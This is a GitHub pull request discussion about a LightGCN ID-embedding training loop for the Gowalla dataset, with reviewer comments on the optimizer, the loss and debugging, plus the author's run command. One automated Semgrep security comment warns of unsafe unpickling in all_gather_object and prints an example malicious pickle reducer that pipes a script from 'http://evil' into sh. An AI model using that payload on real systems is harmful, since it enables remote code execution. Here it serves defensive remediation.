-
Notifications
You must be signed in to change notification settings - Fork 12
Id embedding training loop heterogeneous #407
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
base: main
Are you sure you want to change the base?
Conversation
| for name, param in base_model._embedding_bag_collection.named_parameters(): | ||
| logger.info(f" Applying RowWiseAdagrad to {name}") | ||
| apply_optimizer_in_backward( | ||
| optimizer_class=RowWiseAdagrad, | ||
| params=[param], | ||
| optimizer_kwargs={"lr": sparse_lr, "weight_decay": weight_decay}, | ||
| ) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
conventional pattern is to just call apply_optimizer_in_backward once with all the sparse parameters instead of one by one -- i recommend doing this to avoid deviating from this pattern unnecessarily
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Will change
| return loss, debug_info | ||
|
|
||
|
|
||
| def _training_process( |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
i would recommend testing everything related to loss reduction in single-process, no distributed
| return main_loader, random_negative_loader | ||
|
|
||
|
|
||
| def bpr_loss( |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
to debug whether actually minimizing BPR is causing some specific issue or if it's just something else that is broken, i recommend testing with a dummy loss, which is very easy to minimize. e.g. minimizing sum of query embedding + positive embedding + negative embedding or something. in such case, just making all numbers in each embedding smaller should reduce loss and it's very trivial to optimize. if embeddings still aren't getting updated properly and loss still doesn't go down after that change, this indicates something is very likely broken with the optimization/gradient flow.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
With BPR loss, I am able to go from about 0.6913 -> 0.2335 in 1000 batches of size 512.
|
can you add a run command so we know all the parameter used and how to kick this off locally? |
nshah-sc
left a comment
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
sorry forgot to submit this review which has associated comments
| query_emb: torch.Tensor, # [M, D] | ||
| pos_emb: torch.Tensor, # [M, D] | ||
| neg_emb: torch.Tensor, # [M, D] or [M, K, D] | ||
| l2_lambda: float = 0.0, |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
i don't think you need l2 lambda -- this is basically just applying l2 regularization right? we already have weight decay, which is functionally same as l2 regularization
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I will look into disabling this and comparing the output.
| # Sample some actual node IDs | ||
| debug_info["sample_query_ids"] = rep_query_idx[:5].tolist() | ||
| debug_info["sample_pos_ids"] = pos_idx[:5].tolist() | ||
|
|
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
i'm not sure exactly what this function does as the logic looks fairly complex but i assume we have tested correctness that the samples generated here for the positive edge subgraph and the negative edge subgraphs are all correct in that they reflect accurate graph structure and nothing has gone wrong there.
| logger.info(f"---Rank {rank} initializing embeddings with scaled Xavier uniform (AFTER DMP)") | ||
| unwrapped_model = unwrap_from_dmp(model) | ||
| logger.info(f"EmbeddingBagCollection parameters:") | ||
| init_count = 0 | ||
| EMBEDDING_SCALE = 0.1 # Small scale to avoid saturation | ||
| for name, param in unwrapped_model._embedding_bag_collection.named_parameters(): | ||
| logger.info(f" Found parameter: {name}, shape: {param.shape}, device: {param.device}") | ||
| logger.info(f" BEFORE init - mean={param.mean().item():.6f}, std={param.std().item():.6f}, norm={param.norm().item():.6f}") | ||
|
|
||
| # Xavier uniform: U(-sqrt(6/(fan_in + fan_out)), sqrt(6/(fan_in + fan_out))) | ||
| # For embeddings: fan_in = 1, fan_out = embedding_dim | ||
| # Then scale up to combat LightGCN's aggressive neighbor averaging | ||
| torch.nn.init.xavier_uniform_(param) | ||
| param.data *= EMBEDDING_SCALE | ||
| init_count += 1 | ||
|
|
||
| logger.info(f" AFTER init (scaled {EMBEDDING_SCALE}x) - mean={param.mean().item():.6f}, std={param.std().item():.6f}, norm={param.norm().item():.6f}") | ||
|
|
||
| logger.info(f"Initialized {init_count} embedding parameters after DMP wrapping with {EMBEDDING_SCALE}x scaling") |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
i don't think you actually need this and you should still be able to train these models despite doing manual embedding surgery for initialization. even just their default random initialization should be reasonable starting spot. i'd suggest dropping this to avoid overcomplicating the example
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Yeah, I agree
|
|
||
| optimizer.zero_grad() | ||
| logger.info(f"Zeroing gradients") | ||
| main_data = next(train_main_iter) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
maybe @kmontemayor2-sc can help you debug why this hangs after some fixed # of batches in your current setting. sometimes this can happen if the iterator runs out of data, which shouldn't be possible given the InfiniteIterator logic, but if it's hanging always after 17 batches it indicates there is some deterministic issue. maybe it hangs after it finishes like one whole pass of the data, and cannot appropriately cycle back for another pass due to exception handling/un-terminate-able logic in the iterator code. or, perhaps the dataloader always fails/hangs on a particular seed node that appears after 17 batches. debugging which is true is important and can be done in isolation of this whole example. I'd recommend doing all this in one process as well to avoid getting errors randomly suppressed due to multiprocessing environment.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
@kmontemayor2-sc and @mkolodner-sc helped greatly, and we sort of figured it out by increasing the number of sampling workers. I can now train locally and minimize loss, which is good.
| node_type_to_num_nodes[node_type] = num_nodes | ||
| logger.info(f"Node type {node_type}: {num_nodes} nodes (max_id={max_id})") | ||
| output_list = [None for _ in range(torch.distributed.get_world_size())] | ||
| torch.distributed.all_gather_object(output_list, node_type_to_num_nodes) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Semgrep identified an issue in your code:
all_gather_object unpickles data from peers. A hostile rank can send a crafted object that executes code on your process during the collective.
More details about this
torch.distributed.all_gather_object(output_list, node_type_to_num_nodes) receives Python objects from every peer and unpickles them. Because unpickling executes attacker‑controlled reducers, a malicious or compromised rank can make your process run arbitrary code as soon as the collective completes.
Concrete exploit path
- Setup: init_process_group(backend="gloo") creates a process group where every rank exchanges objects.
- Attacker control: A hostile rank crafts an object whose reduce triggers a command (e.g., to drop a shell or exfiltrate secrets).
- Trigger: When your code calls torch.distributed.all_gather_object(output_list, node_type_to_num_nodes), the library unpickles the attacker’s object before putting it into output_list.
- Impact: Code runs within your training/data‑loading process, with your permissions (can read dataset, env vars, credentials, write to model outputs, pivot the host). Example attacker object on a peer:
class Pwn:
def reduce(self):
import os
return (os.system, ("curl -s http://evil/p.sh|sh",))
torch.distributed.all_gather_object([None]*world_size, Pwn())
Your process will execute the os.system payload as part of unpickling during the same all_gather_object that populates output_list.
Why this code is at risk here
- The call site exchanges arbitrary Python objects (node_type_to_num_nodes dict) with every participant; any untrusted or compromised peer can inject a malicious object that is executed on receipt.
- The subsequent loop over output_list happens after the dangerous unpickle has already occurred, so the damage is done even if you never use the malicious data.
To resolve this comment:
✨ Commit Assistant Fix Suggestion
- Only use
torch.distributed.all_gather_objectto share simple or builtin Python types, such as dictionaries with string and int keys/values, not arbitrary objects or classes. - Check that
node_type_to_num_nodesonly contains basic, serializable objects; avoid custom objects or types that require pickle to deserialize. - If sharing custom objects is required, serialize
node_type_to_num_nodesto a safe format like JSON withjson.dumps(node_type_to_num_nodes)before broadcasting, and deserialize after receiving withjson.loads. - Alternatively, if all participants can reconstruct the dictionary from public information, avoid transmitting it with
all_gather_objectand have each process build it independently. - Avoid using any of the following for keys or values when sharing data: classes, functions, non-builtin types, or anything that cannot be converted to JSON.
Passing only simple objects reduces the attack surface for arbitrary code execution caused by Python's pickle mechanism in distributed functions.
💬 Ignore this finding
Reply with Semgrep commands to ignore this finding.
/fp <comment>for false positive/ar <comment>for acceptable risk/other <comment>for all other reasons
Alternatively, triage in Semgrep AppSec Platform to ignore the finding created by pickles-in-pytorch-distributed.
You can view more details about this finding in the Semgrep AppSec Platform.
Scope of work done
This is my training loop for LightGCN on the gowalla dataset.
There are a number of issues I can't seem to figure out:
587I have tried many things to address the loss:
I use this command to run the training locally:
PYTHONWARNINGS=ignore WORLD_SIZE=1 RANK=0 MASTER_ADDR="localhost" MASTER_PORT=20000 python -m GiGL.examples.id_embeddings.heterogeneous_training --task_config_uri="gs://gigl-perm-dev-assets/swong3_gowalla_data_preprocessor_24/config_populator/frozen_gbml_config.yaml"The parameters are derived from the task config, but I will list them here for reference:
Got training args local_world_size=1, num_neighbors={user-to_train-item: [10, 10], user-to_test-item: [0, 0], item-to_train-user: [15, 15], item-to_test-user: [0, 0]}, sampling_workers_per_process=4, main_batch_size=16, random_batch_size=16, embedding_dim=64, num_layers=2, num_random_negs_per_pos=1, l2_lambda=0.0, sampling_worker_shared_channel_size=4GB, process_start_gap_seconds=0, log_every_n_batch=50, learning_rate=0.01, weight_decay=0.0005, num_max_train_batches=1000, num_val_batches=100, val_every_n_batch=50Where is the documentation for this feature?: N/A
Did you add automated tests or write a test plan?
Updated Changelog.md? NO
Ready for code review?: NO